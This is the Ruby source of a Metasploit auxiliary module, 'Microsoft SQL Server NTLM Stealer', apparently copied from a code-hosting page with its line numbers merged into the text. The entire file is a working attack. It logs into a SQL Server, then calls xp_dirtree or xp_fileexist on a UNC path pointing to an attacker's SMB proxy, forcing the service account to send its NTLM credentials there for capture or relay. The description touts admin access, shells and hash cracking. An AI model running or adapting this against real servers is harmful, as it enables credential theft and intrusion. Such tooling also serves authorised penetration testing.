Path: blob/master/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::MSSQL7include Msf::Auxiliary::Scanner89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Microsoft SQL Server NTLM Stealer',14'Description' => %q{15This module can be used to help capture or relay the LM/NTLM credentials of the16account running the remote SQL Server service. The module will use the supplied17credentials to connect to the target SQL Server instance and execute the native18"xp_dirtree" or "xp_fileexist" stored procedure. The stored procedures will then19force the service account to authenticate to the system defined in the SMBProxy20option. In order for the attack to be successful, the SMB capture or relay module21must be running on the system defined as the SMBProxy. The database account used22to connect to the database should only require the "PUBLIC" role to execute.23Successful execution of this attack usually results in local administrative access24to the Windows system. Specifically, this works great for relaying credentials25between two SQL Servers using a shared service account to get shells. However, if26the relay fails, then the LM hash can be reversed using the Halflm rainbow tables27and john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer for the28inspiration.29},30'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>' ],31'License' => MSF_LICENSE,32'References' => [[ 'URL', 'https://en.wikipedia.org/wiki/SMBRelay' ]],33'Notes' => {34'Stability' => [CRASH_SAFE],35'SideEffects' => [IOC_IN_LOGS],36'Reliability' => []37}38)39)4041register_options(42[43OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),44]45)46end4748def run_host(_ip)49# Reminder50print_status('DONT FORGET to run a SMB capture or relay module!')5152# Call auth_force method to execute "xp_dirtree"53begin54force_auth('xp_dirtree', datastore['SMBPROXY'])55return56rescue StandardError57print_error('xp_dirtree failed to initiate authentication to smbproxy.')58end5960# Call auth_force method to execute "xp_fileexist" if "xp_dirtree" fails61begin62force_auth('xp_fileexist', datastore['SMBPROXY'])63rescue StandardError64print_error('xp_fileexist failed to initiate authentication to smbproxy.')65end66end6768# Method to force sql server to authenticate69def force_auth(sprocedure, smbproxy)70print_status("Forcing SQL Server at #{rhost} to auth to #{smbproxy} via #{sprocedure}...")7172# Generate random file name73rand_filename = Rex::Text.rand_text_alpha(8, '')7475# Setup query76sql = "#{sprocedure} '\\\\#{smbproxy}\\#{rand_filename}'"77result = mssql_query(sql, false) if mssql_login_datastore78result[:rows]79print_good("Successfully executed #{sprocedure} on #{rhost}")80print_good('Go check your SMB relay or capture module for goodies!')81end82end838485